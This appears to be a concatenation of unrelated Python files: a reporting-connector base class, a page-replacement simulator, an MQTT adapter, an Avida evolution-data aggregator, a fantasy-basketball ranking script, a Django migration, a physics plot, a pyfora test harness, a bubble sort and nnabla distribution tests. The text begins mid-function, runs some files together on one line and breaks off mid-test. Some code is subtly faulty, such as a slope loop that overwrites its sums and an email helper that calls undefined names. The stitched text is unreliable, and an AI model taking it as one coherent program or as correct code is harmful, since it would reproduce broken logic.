report_details: ReportConfig) -> None: """Streams the report CSV to Cloud Storage. Args: bucket (str): GCS Bucket report_data (dict): Report definition """ pass def normalize_report_details(self, report_object: Dict[str, Any], report_id: str) -> Dict[str, Any]: """Normalizes the api format report into a flattened data structure. Args: report_object: Report details from api queries method report_id: the report id. Returns: result (Dict): the normalized data structure """ pass def fetch_report_config(self, report_object: Dict[str, Any], report_id: str) -> Dict[str, Any]: """Fetches a report configuration. This fetched the latest version of a report's configuration from the product, normalizes it fo the format that Report2BQ wants, and merges in the Report2BQ state fields. Args: report_object (Dict[str, Any]): the existing report object report_id (str): the report id Returns: Dict[str, Any]: the updated configuration """ report_data = self.normalize_report_details(report_object=report_object, report_id=report_id) keys_to_update = [ 'email', 'dest_dataset', 'dest_project', 'dest_table', 'notifier', 'schema', 'append', 'force', 'infer_schema'] for key in keys_to_update: if key in report_object: report_data[key] = report_object[key] return report_data def get_latest_report_file(self, report_id: str) -> Dict[str, Any]: """Fetch the last known successful report's definition. Args: report_id: report id Returns: result (Dict): the last known report, or an empty Dict if it has not yet run. """ pass def run_report(self, report_id: int, asynchronous: bool = True) -> Dict[str, Any]: """Runs a report on the product. Args: report_id (int): the report to run. 
asynchronous (bool): fire and forget or wait for the result. Returns: Dict[str, Any]: the run result """ pass def check_running_report(self, config: Dict[str, Any]): pass def get_reports(self) -> Dict[str, Any]: """Fetches a list of reports for current user. Returns: result (Dict): the list of reports for the current user. """ pass def get_report_definition(self, report_id: int, fields: str = None) -> Mapping[str, Any]: """Fetches the report definition. Args: report_id: report id Returns: the report definition """ pass def create_report(self, report: Mapping[str, Any]) -> Union[str, Mapping[str, Any]]: """Creates a new report. Args: report (Mapping[str, Any]): the report definition Returns: Union[str, Mapping[str, Any]]: the report, or the error. """ pass class ReportRunner(object): report_type = None project = None email = None @decorators.lazy_property def firestore(self) -> firestore.Firestore: return firestore.Firestore(project=self.project, email=self.email) def run(self, unattended: bool): """Runs the report. Args: unattended (bool): wait for the result or just run and log for the run monitor. """ pass def _email_error(self, message: str, email: str = None, error: Exception = None) -> None: """Emails the error to the owner, and the administrator if defined. Args: message (str): the message email (str, optional): report owner email. Defaults to None. error (Exception, optional): any error. Defaults to None. """ to = [email] if email else [] administrator = \ os.environ.get('ADMINISTRATOR_EMAIL') or \ self.FIRESTORE.get_document(report_type.Type._ADMIN, 'admin').get('email') cc = [administrator] if administrator else [] if to or cc: body = f'{message}{gmail.error_to_trace(error)}' message = gmail.GMailMessage(to=to, cc=cc, subject=f'Error in report_loader', body=body, project=self.project) gmail.send_message(message=message, credentials=credentials.Credentials( email=email, project=self.project)) def strip_nulls(value: Iterable) -> Iterable: """Removes null values from iterables. Recursively remove all None values from dictionaries and lists, and returns the result as a new dictionary or list. Args: value (Any): any list or dict to have empty values removed. """ if isinstance(value, list): return [strip_nulls(x) for x in value if x is not None] elif isinstance(value, dict): return { key: strip_nulls(val) for key, val in value.items() if val is not None } else: return value memory_size = 8 def read_from_ref(path): file = open(path, 'r') lines = file.readlines() total_count = 0 hit_count, miss_count = 0, 0 trace_lst = [] physical_memory = [] for line in lines: # print("Line{}: {}".format(count, line.strip())) total_count +=1 address = line.strip().split(' ')[1] trace_lst.append(address) assert(len(trace_lst) == total_count) for i in range(len(trace_lst)): # print("access trace number: {}, trace is {}\n".format(i+1, trace_lst[i])) # print("before:\n") # print(physical_memory) if trace_lst[i] in physical_memory: hit_count +=1 else: miss_count += 1 if len(physical_memory) < memory_size: physical_memory.append(trace_lst[i]) else: # need to replace page reversed_remain_trace_lst = trace_lst[i+1:][::-1] #find the one in physical memory which will not be used for the longest time in future. 
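# For reference, a minimal sketch (illustrative helper only, not part of this script)
# of the textbook Belady/OPT victim choice that the comment above describes: evict the
# resident page whose next reference lies furthest in the future, treating pages that
# are never referenced again as furthest of all.
#
#   def opt_victim(memory, remaining):
#       def next_use(page):
#           return remaining.index(page) if page in remaining else float('inf')
#       return max(range(len(memory)), key=lambda j: next_use(memory[j]))
#
# The loop below approximates this by scanning the reversed remaining trace.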
idx = 0 invisible_index = 100000 if physical_memory[idx] in reversed_remain_trace_lst: invisible_index = reversed_remain_trace_lst.index(physical_memory[idx]) else: invisible_index = -1 # physical_memory[idx] = trace_lst[i] # continue for j in range(memory_size): if physical_memory[j] in reversed_remain_trace_lst: temp_index = reversed_remain_trace_lst.index(physical_memory[j]) if temp_index < invisible_index: idx = j invisible_index = temp_index else: idx = j invisible_index = -1 # replace physical_memory[idx] = trace_lst[i] # print("after:\n") # print(physical_memory) # print("-----------------------------------------------------") assert(hit_count + miss_count == total_count) hit_rate = hit_count / (hit_count + miss_count) print("hit count: {}\n".format(hit_count)) print("miss count: {}\n".format(miss_count)) print("hit rate: {}\n".format(hit_rate)) if __name__ == '__main__': read_from_ref("trace3.ref")N = int(input()) H = 0 M = 0 for i in range(N): S = int(input()) if S == 1: H = H + 1 else: M = M + 1 print(H) print(M) src/cancer/adapter/mqtt.py from __future__ import annotations import logging import os from dataclasses import dataclass from typing import Type, Callable, Optional, Dict from cancer.message import Message, Topic from cancer.port.publisher import Publisher from cancer.port.subscriber import Subscriber, T from paho.mqtt.publish import single from paho.mqtt.subscribe import callback _LOG = logging.getLogger(__name__) @dataclass class MqttConfig: host: str port: int user: str password: str use_tls: bool transport: Optional[str] = None @property def effective_transport(self) -> str: return self.transport or "tcp" @property def auth(self) -> Dict[str, str]: return {"username": self.user, "password": self.password} @staticmethod def _get_required(key: str) -> str: result = os.getenv(key) if not result: raise ValueError(f"Missing key: {key}") return result @classmethod def from_env(cls) -> MqttConfig: return cls( host=cls._get_required("MQTT_HOST"), port=int(cls._get_required("MQTT_PORT")), user=cls._get_required("MQTT_USER"), password=cls._get_required("MQTT_PASSWORD"), use_tls=cls._get_required("MQTT_TLS_ENABLE") == "true", transport=os.getenv("MQTT_TRANSPORT"), ) @dataclass class MqttPublisher(Publisher): config: MqttConfig def publish(self, topic: Topic, message: Message): _LOG.debug("Publishing message %s", message) single( qos=1, topic=f"cancer/{topic.value}", payload=message.serialize(), hostname=self.config.host, port=self.config.port, transport=self.config.effective_transport, auth=self.config.auth, tls={} if self.config.use_tls else None, ) @dataclass class MqttSubscriber(Subscriber): config: MqttConfig def subscribe( self, topic: Topic, message_type: Type[T], handle: Callable[[T], Subscriber.Result], ): def on_message(client, userdata, message): payload = message.payload _LOG.debug("Received message with payload %s", payload) handle(message_type.deserialize(payload)) callback( on_message, topics=[topic.value], qos=1, hostname=self.config.host, port=self.config.port, transport=self.config.effective_transport, auth=self.config.auth, tls={} if self.config.use_tls else None, ) from allennlp_models.tagging.predictors.sentence_tagger import SentenceTaggerPredictor ''' Aggregate data ''' import argparse, os, sys, errno, subprocess, csv phenotypic_traits = ["not","nand","and","ornot","or","andnot"]#,"nor","xor","equals"] even_traits = {"not", "and", "or"}#, "nor", "equals"} odd_traits = {"nand", "ornot", "andnot", "xor"}#, "equals"} even_profile = "101010"#101" odd_profile = 
"010101"#011" all_profile = "111111"#111" """ This is functionally equivalent to the mkdir -p [fname] bash command """ def mkdir_p(path): try: os.makedirs(path) except OSError as exc: # Python >2.5 if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def extract_params_cmd_log(path): content = None with open(path, "r") as fp: content = fp.read().strip() content = content.replace("./avida", "") params = [param.strip() for param in content.split("-set") if param.strip() != ""] cfg = {param.split(" ")[0]:param.split(" ")[1] for param in params} return cfg def read_avida_dat_file(path): content = None with open(path, "r") as fp: content = fp.read().strip().split("\n") legend_start = 0 legend_end = 0 # Where does the legend table start? for line_i in range(0, len(content)): line = content[line_i].strip() if line == "# Legend:": # Handles analyze mode detail files. legend_start = line_i + 1 break if "# 1:" in line: # Handles time.dat file. legend_start = line_i break # For each line in legend table, extract field fields = [] for line_i in range(legend_start, len(content)): line = content[line_i].strip() if line == "": legend_end = line_i break fields.append( line.split(":")[-1].strip().lower().replace(" ", "_") ) data = [] for line_i in range(legend_end, len(content)): line = content[line_i].strip() if line == "": continue data_line = line.split(" ") if len(data_line) != len(fields): print("data fields mismatch!") print(fields) print(data_line) exit(-1) data.append({field:value for field,value in zip(fields, data_line)}) return data def simple_match_coeff(a, b): if len(a) != len(b): print(f"Length mismatch! {a} {b}") exit(-1) return sum(ai==bi for ai,bi in zip(a,b)) def main(): parser = argparse.ArgumentParser(description="Run submission script.") parser.add_argument("--data_dir_file", type=str, help="Filename that lists all data directories") parser.add_argument("--output_dir", type=str, help="Where to dump this?", default=".") args = parser.parse_args() data_dir_filename = args.data_dir_file output_dir = args.output_dir mkdir_p(output_dir) # Aggregate run directories. run_dirs = [] with open(data_dir_filename, 'r') as fp: for line in fp: line = line.strip() if line != '': run_dirs.append(line) # For each run directory: # - get id, get command line configuration settings summary_header = None summary_content_lines = [] file_str = '' for run_dir in run_dirs: if not os.path.exists(os.path.join(run_dir, 'data', 'analysis')): print('Skipping: ', run_dir) continue summary_info = {} # Hold summary information about run. (one entry per run) print(f"processing {run_dir}") ############################################################ # Extract commandline configuration settings (from cmd.log file) cmd_log_path = os.path.join(run_dir, "cmd.log") cmd_params = extract_params_cmd_log(cmd_log_path) # Infer environmental change and change rate from events file chg_env = "chg" in cmd_params["EVENT_FILE"] env_cond = cmd_params["EVENT_FILE"].split(".")[0].replace("events-", "").lower() seed = cmd_params["RANDOM_SEED"] sensors = cmd_params["DISABLE_REACTION_SENSORS"] summary_info["chg_env"] = chg_env summary_info["environment"] = env_cond for field in cmd_params: summary_info[field] = cmd_params[field] ############################################################ ############################################################ # Extract environment-specific one-step mutant information. 
if not os.path.exists(os.path.join(run_dir, "data", "analysis", "env_all", "knockouts.dat")): print('Skipping (all): ', run_dir) continue if not os.path.exists(os.path.join(run_dir, "data", "analysis", "env_odd", "knockouts.dat")): print('Skipping (odd): ', run_dir) continue if not os.path.exists(os.path.join(run_dir, "data", "analysis", "env_even", "knockouts.dat")): print('Skipping (even): ', run_dir) continue muts_env_all = read_avida_dat_file(os.path.join(run_dir, "data", "analysis", "env_all", "knockouts.dat")) muts_env_odd = read_avida_dat_file(os.path.join(run_dir, "data", "analysis", "env_odd", "knockouts.dat")) muts_env_even = read_avida_dat_file(os.path.join(run_dir, "data", "analysis", "env_even", "knockouts.dat")) # (each of these files should only have one genotype in them) if len(muts_env_all) <= 1 and len(muts_env_even) <= 1 and len(muts_env_odd) <= 1: print("Unexpected number of genotypes in final_dominant data files.") exit(-1) for org_id in range(len(muts_env_all)): phenotype_even = "".join([muts_env_even[org_id][trait] for trait in phenotypic_traits]) phenotype_odd = "".join([muts_env_odd[org_id][trait] for trait in phenotypic_traits]) phenotype_all = "".join([muts_env_all[org_id][trait] for trait in phenotypic_traits]) phenotype_task_order = ";".join(phenotypic_traits) change_odd_even = phenotype_even != phenotype_odd match_score_even = simple_match_coeff(phenotype_even, even_profile) match_score_odd = simple_match_coeff(phenotype_odd, odd_profile) match_score_all = simple_match_coeff(phenotype_all, all_profile) file_str += \ str(chg_env) + ',' + \ env_cond + ',' + \ sensors + ',' + \ seed + ',' + \ str(org_id) + ',' + \ muts_env_all[org_id]['fitness'] + ',' + \ muts_env_odd[org_id]['fitness'] + ',' + \ muts_env_even[org_id]['fitness'] + ',' + \ phenotype_all + ',' + \ phenotype_odd + ',' + \ phenotype_even + ',' + \ phenotype_task_order + ',' + \ str(change_odd_even) + ',' + \ str(match_score_all) + ',' + \ str(match_score_odd) + ',' + \ str(match_score_even) + \ '\n' # write out aggregate data with open(os.path.join(output_dir, "knockout_data.csv"), "w") as fp: out_content = 'chg_env,environment,sensors,seed,org_id,fit_all,fit_odd,fit_even,phenotype_all,phenotype_odd,phenotype_even,phenotype_task_order,change_odd_even,match_score_all,match_score_odd,match_score_even\n' + file_str fp.write(out_content) if __name__ == "__main__": main() 1-10 from math import sqrt from espn_api.basketball import League from termcolor import colored from constantsForLeague import ESPN_s2, SWID, LEAGUE_ID, LEAGUE_SEASON, FULL_SEASON_STATS, LAST7DAYS_STATS, LAST15DAYS_STATS, LAST30DAYS_STATS playersDic = {} statsDic = {} minsList = [] mainLeague = League(league_id=LEAGUE_ID, year=LEAGUE_SEASON, espn_s2=ESPN_s2, swid=SWID) yourTeam = mainLeague.teams[7] yourPlayers = yourTeam.roster agents = mainLeague.free_agents(size=300) agents = agents + yourPlayers # Function for Fantasy Points (FUll SEASON / HEAD TO HEAD) # def myPoints(player): points = 0 points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FGM'] * 2 points -= player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FGM'] - \ player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FGA'] points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FTM'] points -= player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FTA'] - \ player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FTM'] points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['3PTM'] points += 
player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['OREB'] + \ player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['DREB'] points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['AST'] * 2 points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['STL'] * 4 points -= player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['TO'] * 2 points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['PTS'] return points # Method for getting key value# def get_key(val): for key, value in playersDic.items(): if val == value: return key return "key doesn't exist" # Main Code to Create Dictionary { PlayerName : Ranking Metric } # for players in agents: if ((players.__getattribute__('injuryStatus') == 'ACTIVE') or (players.__getattribute__('injuryStatus')) == 'NORMAL') and ( LAST7DAYS_STATS in players.__getattribute__('stats').keys()) and ( LAST15DAYS_STATS in players.__getattribute__('stats').keys()) and ( LAST30DAYS_STATS in players.__getattribute__('stats').keys()) and ( players.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['MIN'] >= 25): # vars # pointsPerMin = myPoints(players) / players.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['MIN'] lastSevenDayAverageMin = players.__getattribute__('stats')[LAST7DAYS_STATS]['avg']['MIN'] lastFifteenDayAverageMin = players.__getattribute__('stats')[LAST15DAYS_STATS]['avg']['MIN'] lastThirdlyDayAverageMin = players.__getattribute__('stats')[LAST30DAYS_STATS]['avg']['MIN'] minsList.append(lastThirdlyDayAverageMin) minsList.append(lastFifteenDayAverageMin) minsList.append(lastSevenDayAverageMin) xAxis = [1, 2, 3] slope = 0 count = 0 # Slope Calculation: See Equations.txt # for num in range(0, 3): xSum = 6 ySum = + minsList[num] xySum = + minsList[num] * xAxis[num] delta = 6 slope = 3 * xySum - (xSum * ySum) / 6 # Distance Formula: See Equations.txt # xValue = slope ** 2 yValue = pointsPerMin ** 2 ranking = sqrt((0.2 * xValue) + (0.8 * yValue)) playersDic[players] = ranking minsList.clear() for i in sorted(playersDic.values(), reverse=True): count += 1 print(str(count) + '.', colored(get_key(i).__getattribute__('name'), 'red'))calaccess_processed_filings/migrations/0007_auto_20180426_2354.py # Generated by Django 2.0.4 on 2018-04-26 23:54 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('calaccess_processed_filings', '0006_auto_20180426_1733'), ] operations = [ migrations.CreateModel( name='Form461Filing', fields=[ ('date_filed', models.DateField(db_index=True, help_text='Date this report was filed, according to the filer (from CVR_CAMPAIGN_DISCLOSURE.RPT_DATE)', verbose_name='date filed')), ('filer_id', models.IntegerField(db_index=True, help_text='Numeric filer identification number (from FILER_XREF.FILER_ID)', verbose_name='filer id')), ('filer_lastname', models.CharField(help_text='Last name of filer (from CVR_CAMPAIGN_DISCLOSURE.FILER_NAML)', max_length=200, verbose_name='filer last name')), ('filer_firstname', models.CharField(blank=True, help_text='First name of the filer (from CVR_CAMPAIGN_DISCLOSURE.FILER_NAMF)', max_length=45, verbose_name='filer first name')), ('election_date', models.DateField(db_index=True, help_text='Date of the election in which the filer is participating (from CVR_CAMPAIGN_DISCLOSURE.ELECT_DATE)', null=True, verbose_name='election date')), ('filing_id', models.IntegerField(help_text='Unique identification number for the Form 461 filing (from CVR_CAMPAIGN_DISCLOSURE_CD.FILING_ID)', 
primary_key=True, serialize=False, verbose_name='filing id')), ('amendment_count', models.IntegerField(db_index=True, help_text='Number of amendments to the Form 461 filing (from maximum value of CVR_CAMPAIGN_DISCLOSURE_CD.AMEND_ID)', verbose_name='Count amendments')), ], options={ 'verbose_name': 'Form 461 (Campaign Disclosure) filing', }, ), migrations.CreateModel( name='Form461FilingVersion', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('date_filed', models.DateField(db_index=True, help_text='Date this report was filed, according to the filer (from CVR_CAMPAIGN_DISCLOSURE.RPT_DATE)', verbose_name='date filed')), ('filer_id', models.IntegerField(db_index=True, help_text='Numeric filer identification number (from FILER_XREF.FILER_ID)', verbose_name='filer id')), ('filer_lastname', models.CharField(help_text='Last name of filer (from CVR_CAMPAIGN_DISCLOSURE.FILER_NAML)', max_length=200, verbose_name='filer last name')), ('filer_firstname', models.CharField(blank=True, help_text='First name of the filer (from CVR_CAMPAIGN_DISCLOSURE.FILER_NAMF)', max_length=45, verbose_name='filer first name')), ('election_date', models.DateField(db_index=True, help_text='Date of the election in which the filer is participating (from CVR_CAMPAIGN_DISCLOSURE.ELECT_DATE)', null=True, verbose_name='election date')), ('statement_type', models.CharField(help_text='Type of statement, e.g., "Quarterly", "Semi-Annual", Pre-Election (from CVR_CAMPAIGN_DISCLOSURE.STMT_TYPE)', max_length=50, verbose_name='statement type')), ('from_date', models.DateField(db_index=True, help_text='The first date of the filing period covered by the statement (from CVR_CAMPAIGN_DISCLOSURE.FROM_DATE)', verbose_name='from date')), ('thru_date', models.DateField(db_index=True, help_text='The last date of the filing period covered by the statement (from CVR_CAMPAIGN_DISCLOSURE.THRU_DATE)', verbose_name='thru date')), ('amend_id', models.IntegerField(help_text='Identifies the version of the Form 461 filing, with 0 representing the initial filing (from CVR_CAMPAIGN_DISCLOSURE_CD.AMEND_ID)', verbose_name='amendment id')), ('filing', models.ForeignKey(db_constraint=False, help_text='Unique identification number for the Form 461 filing (from CVR_CAMPAIGN_DISCLOSURE_CD.FILING_ID)', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='versions', to='calaccess_processed_filings.Form461Filing')), ], options={ 'verbose_name': 'Form 461 (Campaign Disclosure) filing version', }, ), migrations.AlterField( model_name='form460filingversion', name='amend_id', field=models.IntegerField(help_text='Identifies the version of the Form 460 filing, with 0 representing the initial filing (from CVR_CAMPAIGN_DISCLOSURE_CD.AMEND_ID)', verbose_name='amendment id'), ), migrations.AlterIndexTogether( name='form461filing', index_together={('filing_id', 'amendment_count')}, ), migrations.AlterUniqueTogether( name='form461filingversion', unique_together={('filing', 'amend_id')}, ), migrations.AlterIndexTogether( name='form461filingversion', index_together={('filing', 'amend_id')}, ), ] import dsconcept.model import dsconcept.train 1-10 from matplotlib import pyplot as plt from math import sin, cos, radians import numpy as np sup_2 = '\N{SUPERSCRIPT TWO}' def force(theta): m = 50 g = 9.8 f_press = 350 return 0.2 * m * g * sin(radians(theta)) * sin(radians(theta)) + f_press * cos(radians(90 - theta)) x = np.linspace(45, 90, 100) y = [] for i in x: y.append(force(i)) plt.title('By pedaling on the 
starting block with same force\n' 'how much forward force (parallel to the ground) I can get\n' 'by setting starting block to different angles?', fontsize=14) plt.xlabel('degree of starting block (degree)', fontsize=14) plt.ylabel('parallel force pointing forward\n(Newton)', fontsize=14) plt.plot(x, y, label=f'F = 20%mg sin{sup_2}\u03b8 + Fp cos(90 - \u03b8)', color='k') dx = [45, 60, 70, 80, 90] dy = [] for i in dx: di = force(i) dy.append(di) if i == 45: plt.annotate(s=f'({i}, {round(di)})', xy=[i + 6, di + 20], fontsize=14) elif i != 90 and i != 80: plt.annotate(s=f'({i}, {round(di)})', xy=[i + 2, di], fontsize=14) elif i == 80: plt.annotate(s=f'({i}, {round(di)})', xy=[i - 8, di + 4], fontsize=14) else: plt.annotate(s=f'({i}, {round(di)})', xy=[i - 7, di - 14], fontsize=14) plt.scatter(dx, dy, color='k', linewidths=3) plt.legend(fontsize=14, loc='lower right') plt.tight_layout() plt.show() ufora/FORA/python/PurePython/ExecutorTestCommon.py # Copyright 2015 Ufora Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pyfora.Exceptions import logging import numpy import pandas import time import traceback class ExecutorTestCommon(object): def create_executor(self, allowCached=True): """Subclasses of the test harness should implement""" raise NotImplementedError() def evaluateWithExecutor(self, func, *args, **kwds): shouldClose = True if 'executor' in kwds: executor = kwds['executor'] shouldClose = False else: executor = self.create_executor(kwds.get('allowCached', True)) try: func_proxy = executor.define(func).result() args_proxy = [executor.define(a).result() for a in args] res_proxy = func_proxy(*args_proxy).result() result = res_proxy.toLocal().result() return result finally: if shouldClose: executor.__exit__(None, None, None) def defaultComparison(self, x, y): if isinstance(x, basestring) and isinstance(y, basestring): return x == y if hasattr(x, '__len__') and hasattr(y, '__len__'): l1 = len(x) l2 = len(y) if l1 != l2: return False for idx in range(l1): if not self.defaultComparison(x[idx], y[idx]): return False return True else: same = x == y and type(x) is type(y) if not same: print "Results differed: ", x, y, ". Types are ", type(x), " and ", type(y) return same def equivalentEvaluationTest(self, func, *args, **kwds): comparisonFunction = self.defaultComparison if 'comparisonFunction' in kwds: comparisonFunction = kwds['comparisonFunction'] with self.create_executor() as executor: t0 = time.time() func_proxy = executor.define(func).result() args_proxy = [executor.define(a).result() for a in args] res_proxy = func_proxy(*args_proxy).result() pyforaResult = res_proxy.toLocal().result() t1 = time.time() pythonResult = func(*args) t2 = time.time() self.assertTrue( comparisonFunction(pyforaResult, pythonResult), "Pyfora and python returned different results: %s != %s for %s(%s), respectively" % ( pyforaResult, pythonResult, func, args) ) if t2 - t0 > 5.0: print "Pyfora took ", t1 - t0, ". 
python took ", t2 - t1 return pythonResult def equivalentEvaluationTestThatHandlesExceptions(self, func, *args, **kwds): comparisonFunction = self.defaultComparison if 'comparisonFunction' in kwds: comparisonFunction = kwds['comparisonFunction'] with self.create_executor() as executor: try: pythonResult = func(*args) pythonSucceeded = True except Exception as ex: pythonSucceeded = False try: pyforaResult = self.evaluateWithExecutor(func, *args, executor=executor) pyforaSucceeded = True except pyfora.Exceptions.ComputationError as ex: if pythonSucceeded: logging.error("Python succeeded, but pyfora threw %s for %s%s", ex, func, args) pyforaSucceeded = False except: logging.error("General exception in pyfora for %s%s:\n%s", func, args, traceback.format_exc()) return False self.assertEqual(pythonSucceeded, pyforaSucceeded, "Pyfora and python returned successes: %s%s" % (func, args) ) if pythonSucceeded: self.assertTrue(comparisonFunction(pythonResult, pyforaResult), "Pyfora and python returned different results: %s != %s for %s%s, respectively" % ( pyforaResult, pythonResult, func, args) ) return pythonResult def assertArraysAreAlmostEqual(self, m1, m2): self.assertTrue( numpy.allclose(m1, m2) ) def checkFramesEqual(self, df1, df2): pandas.util.testing.assert_frame_equal(df1, df2) return True def checkSeriesEqual(self, series1, series2, **kwargs): pandas.util.testing.assert_series_equal(series1, series2, **kwargs) return True 0 __author__ = '' """ Отсортировать по убыванию методом «пузырька» одномерный целочисленный массив, заданный случайными числами на промежутке [-100; 100). Вывести на экран исходный и отсортированный массивы. """ import hw_07 as lib def bubble_sort(nsl: list) -> list: """ classic sorting algorithm - bubble sort. :param nsl: type list: non sorted list :return: type list: sorted list """ sl = nsl[:] n = len(sl) if n < 2: return sl for i in range(len(sl)): for j in range(len(sl) - 1, i, -1): if sl[j] > sl[j-1]: sl[j], sl[j-1] = sl[j-1], sl[j] return sl def main(arr: list = None, is_print: bool = True) -> list: """ main function that combines all the functions of the module. :param is_print: type bool: flag, if True, then function will print result, else not print. :param arr: type list: non sorted list, if the value of the parameter is not specified, then an array of random numbers is created. :return: type list: sorted list """ non_sort_list = arr if arr else lib.generate_int_array() sorted_list = bubble_sort(nsl=non_sort_list) if is_print: print(f"Non sorted list:") lib.pretty_print(arr=non_sort_list) print(f"\nList after Bubble sort:") lib.pretty_print(arr=sorted_list) return sorted_list if __name__ == '__main__': main() # Copyright 2020,2021 Sony Corporation. # Copyright 2021 Sony Group Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
import numpy as np import pytest import nnabla as nn import nnabla_rl.distributions as D class TestSquashedGaussian(object): def setup_method(self, method): nn.clear_parameters() np.random.seed(0) def test_sample(self): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mean = np.zeros(shape=input_shape) sigma = np.ones(shape=input_shape) * 5 ln_var = np.log(sigma) * 2.0 distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) sampled = distribution.sample() assert sampled.shape == input_shape sampled.forward(clear_no_need_grad=True) sampled = sampled.data.data assert np.alltrue((-1.0 <= sampled) & (sampled <= 1.0)) def test_choose_probable(self): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mean = np.zeros(shape=input_shape) sigma = np.ones(shape=input_shape) ln_var = np.log(sigma) * 2.0 distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) probable_action = distribution.choose_probable() assert probable_action.shape == mean.shape probable_action.forward(clear_no_need_grad=True) probable_action = probable_action.data.data assert np.alltrue((-1.0 <= probable_action) & (probable_action <= 1.0)) assert np.allclose(probable_action, np.tanh(mean), atol=1e-5) def test_mean(self): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mean = np.zeros(shape=input_shape) sigma = np.ones(shape=input_shape) ln_var = np.log(sigma) * 2.0 distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) with pytest.raises(NotImplementedError): distribution.mean() @pytest.mark.parametrize("x", np.arange(start=-1.0, stop=1.0, step=0.25)) @pytest.mark.parametrize("mean", np.arange(start=-1.0, stop=1.0, step=0.25)) @pytest.mark.parametrize("var", np.arange(start=1.0, stop=2.0, step=0.25)) def test_log_prob(self, x, mean, var): mean = np.array(mean).reshape((1, 1)) ln_var = np.array(np.log(var)).reshape((1, 1)) distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) ln_var = np.log(var) gaussian_log_prob = -0.5 * \ np.log(2.0 * np.pi) - 0.5 * ln_var - \ (x - mean) ** 2 / (2.0 * var) log_det_jacobian = np.log(1 - np.tanh(x) ** 2) expected = np.sum(gaussian_log_prob - log_det_jacobian, axis=-1, keepdims=True) x_var = nn.Variable((1, 1)) x_var.d = np.tanh(x) actual = distribution.log_prob(x_var) actual.forward(clear_no_need_grad=True) actual = actual.data.data assert np.isclose(expected, actual) @pytest.mark.parametrize("mean", np.arange(start=-1.0, stop=0.5, step=0.25)) @pytest.mark.parametrize("var", np.arange(start=0.5, stop=1.5, step=0.25)) def test_sample_and_compute_log_prob(self, mean, var): mean = np.array(mean).reshape((1, 1)) ln_var = np.array(np.log(var)).reshape((1, 1)) distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) ln_var = np.log(var) sample, actual = distribution.sample_and_compute_log_prob() # FIXME: if you enable clear_no_need_grad seems to compute something different # Do NOT use forward_all and no_need_grad flag at same time # nnabla's bug? 
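# The expected value computed below follows the tanh change of variables for a
# squashed Gaussian: for y = tanh(x) with x ~ N(mean, var),
#   log p(y) = log N(x; mean, var) - log(1 - tanh(x)**2),
# summed over the last axis.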
nn.forward_all([sample, actual]) x = np.arctanh(sample.data.data, dtype=np.float64) gaussian_log_prob = -0.5 * \ np.log(2.0 * np.pi) - 0.5 * ln_var - \ (x - mean) ** 2 / (2.0 * var) log_det_jacobian = np.log(1 - np.tanh(x) ** 2) expected = np.sum(gaussian_log_prob - log_det_jacobian, axis=-1, keepdims=True) actual = actual.data.data assert np.isclose(expected, actual, atol=1e-3, rtol=1e-2) def test_sample_and_compute_log_prob_shape(self): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mean = np.zeros(shape=input_shape) sigma = np.ones(shape=input_shape) ln_var = np.log(sigma) * 2.0 distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) sample, actual_log_prob = distribution.sample_and_compute_log_prob() assert sample.shape == input_shape assert actual_log_prob.shape == (batch_size, 1) @pytest.mark.parametrize("mean", np.arange(start=-1.0, stop=1.0, step=0.25)) @pytest.mark.parametrize("var", np.arange(start=1.0, stop=2.0, step=0.25)) def test_sample_multiple_and_compute_log_prob(self, mean, var): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mu = np.ones(shape=input_shape) * mean ln_var = np.ones(shape=input_shape) * np.log(var) distribution = D.SquashedGaussian(mean=mu, ln_var=ln_var) num_samples = 10 samples, log_probs = distribution.sample_multiple_and_compute_log_prob( num_samples=num_samples) # FIXME: if you enable clear_no_need_grad seems to compute something different # Do NOT use forward_all and no_need_grad flag at same time # nnabla's bug? nn.forward_all([samples, log_probs]) assert np.alltrue(-1.0 <= samples.d) assert np.alltrue(samples.d <= 1.0) # Check the first sample independently x = np.arctanh(samples.d[:, 0, :], dtype=np.float64) assert x.shape == (batch_size, output_dim) gaussian_log_prob = -0.5 * np.log(2.0 * np.pi) - 0.5 * ln_var - \ (x - mu) ** 2 / (2.0 * var) 